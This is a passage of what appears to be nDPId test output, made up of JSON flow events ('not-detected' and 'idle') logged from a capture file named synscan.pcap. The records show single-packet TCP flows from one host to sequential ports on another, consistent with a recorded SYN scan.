{"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 